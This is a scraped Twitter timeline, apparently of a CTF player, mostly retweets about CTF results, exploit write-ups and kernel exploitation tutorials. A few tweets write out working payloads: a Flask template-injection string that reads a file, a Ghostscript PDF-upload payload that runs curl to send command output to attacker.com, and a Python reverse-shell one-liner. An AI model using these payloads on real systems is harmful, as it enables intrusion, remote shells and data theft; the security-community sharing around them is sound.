Tweetovi
- Tweetovi, trenutna stranica.
- Tweetovi i odgovori
- Medijski sadržaj
Blokirali ste korisnika/cu @_bincat
Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @_bincat
-
Prikvačeni tweet
bincat means a cat in the bin :p
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
bincat proslijedio/la je Tweet
We got 2nd place in
#36c3 ctf! Thanks to@hxpctf for the great problems.https://twitter.com/hxpctf/status/1211376520649940993 …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
bincat proslijedio/la je Tweet
Better late than never. Official writeup repo from A*0*E release, along with the aforementioned tricky exp in the gomium challenge.https://github.com/A-0-E/writeups
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
bincat proslijedio/la je Tweet
Here are some SSRF reports You should read https://hackerone.com/reports/544928 https://hackerone.com/reports/305974 https://hackerone.com/reports/156511 https://hackerone.com/reports/648434 https://hackerone.com/reports/643622 https://hackerone.com/reports/296045 https://hackerone.com/reports/341876 https://hackerone.com/reports/514664
#bugbounty,#bugbountytipsHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
bincat proslijedio/la je Tweet
We just released the challenges of this year's
#GoogleCTF finals together with a short write up of the intended solutions: https://github.com/google/google-ctf/blob/master/2019/finals/solutions.pdf … If anything is not clear, feel free to DM me and I can share more details about the challenges.Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
bincat proslijedio/la je Tweet
I once exploited SSTI in flask app with payload: {{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40](\"/tmp/flag\").read() }} If you find SSTI, you NEED to show how to exploit! Reading files is perfect.
#bugbountytips#BugBounty#bugbountytip payload not by meHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
bincat proslijedio/la je Tweet
Thank you for playing
#ASIS#CTF Finals 2019. I wrote pwn tasks: https://bitbucket.org/ptr-yudai/writeups/src/master/2019/ASIS_CTF_Final_2019/ …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
bincat proslijedio/la je Tweet
Pwntools 3.13.0 / 4.0.0beta0 released. 3.13 is mostly bugfixes, but 4 beta finally supports Py3! See http://github.com/Gallopsled/pwntools … for details
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
bincat proslijedio/la je Tweet
RCE on PDF upload: Content-Disposition: form-data; name="fileToUpload"; filename="pwn.pdf" Content-Type: application/pdf %!PS currentdevice null true mark /OutputICCProfile (%pipe%curl http://attacker.com/?a=$(whoami|base64 …) ) .putdeviceparams quit
#BugBountyPrikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
bincat proslijedio/la je TweetHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
bincat proslijedio/la je Tweet
I found myself in need of a much shorter python reverse oneliner than shellpop provides by default. Here's what I landed on.
python -c "import pty,socket;h,p='192.168.200.1',12345;socket.create_connection((h,p));pty.spawn('/bin/sh');"Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
bincat proslijedio/la je Tweet
There are been some questions about my Hyper-V slides so they are now up at https://github.com/FoxHex0ne/Slides … NB: POC will release all the slides in a week or so also. Certainly take a look of all of them - 1st day already had very good ones :)
#poc2019Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
bincat proslijedio/la je Tweet
Exploiting Race Conditions Using the Scheduler https://www.youtube.com/watch?v=MIJL5wLUtKE … by
@tehjh from P0 Detailed explanation of 3 exploits and associated techniques involving scheduler, preemption, stale TLB, fuse, userfaultfd and more to make hard to trigger races deterministic. 2/3Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
bincat proslijedio/la je Tweet
디스코드의 보안 취약점을 이용한 백도어가 발견됨 %AppData%\Discord\버젼\modules\discord_modules\index.js %AppData%\Discord\버젼\modules\discord_desktop_core\index.js 해당 파일의 내용이 2줄을 넘어가면 감염된 것이니 재설치 해야함 출처 :https://www.bleepingcomputer.com/news/security/discord-turned-into-an-info-stealing-backdoor-by-new-malware/ …
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
bincat proslijedio/la je Tweet
Privilege escalation in Windows Domains:- Part 1:- https://blog.compass-security.com/2019/07/privilege-escalation-in-windows-domains-1-3/ … Part 2:- https://blog.compass-security.com/2019/08/privilege-escalation-in-windows-domains-2-3/ … Part 3:- https://blog.compass-security.com/2019/08/privilege-escalation-in-windows-domains-3-3/ …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
bincat proslijedio/la je TweetHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
bincat proslijedio/la je Tweet
Published the write-up of PoE - Path of Exploitation for HITCON CTF! Includes why and how I designed these challenges and how to exploit from the userspace program, the kernel, to QEMU! https://david942j.blogspot.com/2019/10/official-write-up-hitcon-ctf-quals-2019.html …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
bincat proslijedio/la je Tweet
I wrote a tutorial about return 2 user technique. It's a bit incomplete. I have to add techniques for using 'iret' instruction to return directly to userspace. https://github.com/pr0cf5/kernel-exploit-practice/tree/master/return-to-user … Any feedback is welcome
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Instead of full writeup, I just wrote some comments on http://shell.cc during the competition, I read https://mdsattacks.com/slides/slides.html … and https://github.com/pietroborrello/RIDL-and-ZombieLoad … really helpful
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Yes, micro-architectural attacks are always fun! Here is my solution https://github.com/bincat99/pwn/tree/master/2019/gctf/final/ridl …
#GoogleCTFPrikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.